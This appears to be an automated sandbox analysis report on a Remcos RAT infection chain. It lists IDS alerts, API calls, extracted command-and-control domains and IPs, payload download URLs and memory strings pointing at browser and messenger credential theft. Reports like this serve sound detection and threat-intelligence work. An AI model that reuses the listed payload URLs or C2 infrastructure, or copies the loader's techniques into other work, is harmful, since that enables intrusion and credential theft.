Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_00406F13 FindFirstFileW,FindNextFileW,	8_2_00406F13
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	8_2_100010F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_10006580 FindFirstFileExA,	8_2_10006580
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_0040B477 FindFirstFileW,FindNextFileW,	9_2_0040B477
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,	10_2_00407EF8
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,	11_2_00407898

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 8_2_00407357 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

8_2_00407357

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\SysWOW64\wscript.exe

Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.8:49697 -> 176.65.144.247:3980
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.8:49695 -> 192.169.69.26:3980
Source: Network traffic	Suricata IDS: 2032777 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Server Response : 176.65.144.247:3980 -> 192.168.2.8:49697
Source: Network traffic	Suricata IDS: 2047750 - Severity 1 - ET MALWARE Base64 Encoded MZ In Image : 217.154.55.185:80 -> 192.168.2.8:49693
Source: Network traffic	Suricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 172.245.123.32:80 -> 192.168.2.8:49694
Source: Network traffic	Suricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 172.245.123.32:80 -> 192.168.2.8:49694
Source: Network traffic	Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 217.154.55.185:80 -> 192.168.2.8:49693
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.8:49696 -> 192.169.69.26:3981
Source: Network traffic	Suricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 172.245.123.32:80 -> 192.168.2.8:49694
Source: Network traffic	Suricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 172.245.123.32:80 -> 192.168.2.8:49694

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\wscript.exe

Network Connect: 23.186.113.60 443

Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: hftook7lmaroutsg1.duckdns.org
Source: Malware configuration extractor	URLs: hftook7lmaroutsg1.duckdns.org
Source: Malware configuration extractor	URLs: hftook7lmaroutsg2.duckdns.org
Source: Malware configuration extractor	URLs: hftook7lmaroutsg3.duckdns.org
Source: Malware configuration extractor	URLs: hftook7lmaroutsg4.duckdns.org
Source: Malware configuration extractor	URLs: hftook7lmaroutsg5.duckdns.org

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: paste.ee

Uses dynamic DNS services

Source: unknown	DNS query: name: hftook7lmaroutsg2.duckdns.org
Source: unknown	DNS query: name: hftook7lmaroutsg1.duckdns.org

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.8:49697 -> 176.65.144.247:3980

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /xampp/c/new_image.jpg HTTP/1.1Host: 217.154.55.185Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xampp/visa/creatingbestthingsforhisbeststepstotakehim.txt HTTP/1.1Host: 172.245.123.32Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 23.186.113.60 23.186.113.60
Source: Joe Sandbox View	IP Address: 217.154.55.185 217.154.55.185
Source: Joe Sandbox View	IP Address: 178.237.33.50 178.237.33.50

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: KCOM-SPNService-ProviderNetworkex-MistralGB KCOM-SPNService-ProviderNetworkex-MistralGB
Source: Joe Sandbox View	ASN Name: WOWUS WOWUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Suricata IDS alerts with low severity for network traffic

Source: Network traffic

Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.8:49699 -> 178.237.33.50:80

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /d/c30NOIBR/0 HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.eeConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 8_2_00427321 recv,

8_2_00427321

Source: global traffic	HTTP traffic detected: GET /d/c30NOIBR/0 HTTP/1.1Accept: /Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.eeConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xampp/c/new_image.jpg HTTP/1.1Host: 217.154.55.185Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xampp/visa/creatingbestthingsforhisbeststepstotakehim.txt HTTP/1.1Host: 172.245.123.32Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: recover.exe, 00000009.00000002.1151189070.0000000003539000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 00000009.00000003.1150494750.0000000003539000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ://192.168.2.1/all/install/setup.au3https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config equals www.facebook.com (Facebook)
Source: recover.exe, 00000009.00000002.1151189070.0000000003539000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 00000009.00000003.1150494750.0000000003539000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ://192.168.2.1/all/install/setup.au3https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config equals www.yahoo.com (Yahoo)
Source: CasPol.exe, 00000008.00000002.3469653795.0000000004540000.00000040.10000000.00040000.00000000.sdmp, recover.exe, 00000009.00000002.1150649991.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.dathttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: CasPol.exe, 00000008.00000002.3469653795.0000000004540000.00000040.10000000.00040000.00000000.sdmp, recover.exe, 00000009.00000002.1150649991.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.dathttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: CasPol.exe, 00000008.00000002.3469164599.00000000038E0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, 0000000B.00000002.1121592224.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: CasPol.exe, 00000008.00000002.3469164599.00000000038E0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 0000000B.00000002.1121592224.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: recover.exe	String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)

Source: global traffic	DNS traffic detected: DNS query: paste.ee
Source: global traffic	DNS traffic detected: DNS query: hftook7lmaroutsg1.duckdns.org
Source: global traffic	DNS traffic detected: DNS query: hftook7lmaroutsg2.duckdns.org
Source: global traffic	DNS traffic detected: DNS query: geoplugin.net

Source: powershell.exe, 00000005.00000002.1078641425.0000000005395000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://172.245.123.32
Source: powershell.exe, 00000005.00000002.1078641425.0000000005395000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://172.245.123.32/xampp/visa/creatingbestthingsforhisbeststepstotakehim.txt
Source: powershell.exe, 00000005.00000002.1078641425.00000000050B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://217.154.55.185
Source: powershell.exe, 00000005.00000002.1078641425.00000000050B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://217.154.55.185/xampp/c/new_image.jpg
Source: bhv90B.tmp.9.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: bhv90B.tmp.9.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: svchost.exe, 0000000D.00000002.2812616815.0000021A95000000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: bhv90B.tmp.9.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhv90B.tmp.9.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: bhv90B.tmp.9.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: qmgr.db.13.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.13.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.13.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.13.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.13.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.13.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: qmgr.db.13.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: CasPol.exe, CasPol.exe, 00000008.00000002.3467761348.0000000001226000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000008.00000002.3467761348.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp
Source: powershell.exe, 00000005.00000002.1081213353.0000000005FC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1081213353.0000000006382000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000008.00000002.3466361375.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: CasPol.exe, 00000008.00000002.3467761348.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpSystem32
Source: CasPol.exe, 00000008.00000002.3467761348.0000000001226000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpa
Source: CasPol.exe, 00000008.00000002.3467761348.0000000001226000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpj
Source: CasPol.exe, 00000008.00000002.3467761348.0000000001226000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpl
Source: CasPol.exe, 00000008.00000002.3467761348.0000000001226000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpx
Source: powershell.exe, 00000005.00000002.1081213353.0000000005FC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: bhv90B.tmp.9.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: powershell.exe, 00000005.00000002.1078641425.00000000050B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.1078641425.0000000004F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.1078641425.00000000050B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: svchost.exe, 0000000E.00000002.1365372131.0000029365813000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.bingmapsportal.com
Source: CasPol.exe, 00000008.00000002.3469164599.00000000038E0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 0000000B.00000002.1121592224.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com
Source: CasPol.exe, 00000008.00000002.3469164599.00000000038E0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 0000000B.00000002.1121592224.0000000000400000.00000040.80000000.00040000.00000000.sdmp, recover.exe, 0000000B.00000003.1121425570.000000000367D000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000B.00000003.1121454434.000000000367D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.imvu.com
Source: recover.exe, 0000000B.00000003.1121425570.000000000367D000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000B.00000003.1121454434.000000000367D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.imvu.comata
Source: CasPol.exe, 00000008.00000002.3469164599.00000000038E0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, 0000000B.00000002.1121592224.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: CasPol.exe, 00000008.00000002.3469164599.00000000038E0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, 0000000B.00000002.1121592224.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comr
Source: recover.exe, 00000009.00000002.1150759009.0000000003034000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net
Source: recover.exe, 0000000B.00000002.1121592224.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net/
Source: powershell.exe, 00000005.00000002.1078641425.0000000004F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lBDr
Source: wscript.exe, 00000003.00000002.1045595440.000000000599D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://analytics.past
Source: wscript.exe, 00000003.00000002.1043955173.0000000002A28000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041867959.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://analytics.paste.ee
Source: wscript.exe, 00000003.00000002.1044588740.0000000002AFA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041867959.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://analytics.paste.ee;
Source: svchost.exe, 0000000E.00000003.1364626820.000002936585A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365651716.000002936585B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: wscript.exe, 00000003.00000002.1044588740.0000000002AFA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041867959.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1045595440.000000000599D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com
Source: wscript.exe, 00000003.00000002.1043955173.0000000002A28000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041867959.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com;
Source: powershell.exe, 00000005.00000002.1081213353.0000000005FC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.1081213353.0000000005FC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.1081213353.0000000005FC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: svchost.exe, 0000000E.00000003.1364626820.000002936585A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365651716.000002936585B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
Source: svchost.exe, 0000000E.00000003.1364601376.0000029365844000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1363995424.0000029365871000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365717183.0000029365866000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1364546066.000002936585D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1364247213.0000029365842000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365827747.0000029365873000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365570437.0000029365845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1364186133.0000029365865000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000E.00000003.1363995424.0000029365871000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365827747.0000029365873000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000E.00000003.1364626820.000002936585A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365651716.000002936585B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 0000000E.00000003.1364138584.000002936586A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365747346.000002936586B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 0000000E.00000002.1365855166.000002936587A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1363908355.0000029365878000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
Source: svchost.exe, 0000000E.00000003.1364626820.000002936585A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365651716.000002936585B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 0000000E.00000003.1364247213.0000029365842000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 0000000E.00000002.1365717183.0000029365866000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1364546066.000002936585D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365512983.0000029365840000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1364186133.0000029365865000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000E.00000003.1364626820.000002936585A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365651716.000002936585B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 0000000E.00000002.1365450419.000002936582B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1364138584.000002936586A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365747346.000002936586B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 0000000E.00000003.1364626820.000002936585A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365651716.000002936585B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 0000000E.00000003.1364626820.000002936585A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365651716.000002936585B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 0000000E.00000003.1364626820.000002936585A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365651716.000002936585B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 0000000E.00000002.1365717183.0000029365866000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365512983.0000029365840000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1364186133.0000029365865000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
Source: svchost.exe, 0000000E.00000003.1364601376.0000029365844000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1364247213.0000029365842000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365570437.0000029365845000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 0000000E.00000003.1364626820.000002936585A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365651716.000002936585B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 0000000E.00000003.1364601376.0000029365844000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365717183.0000029365866000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1364247213.0000029365842000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365570437.0000029365845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1364186133.0000029365865000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
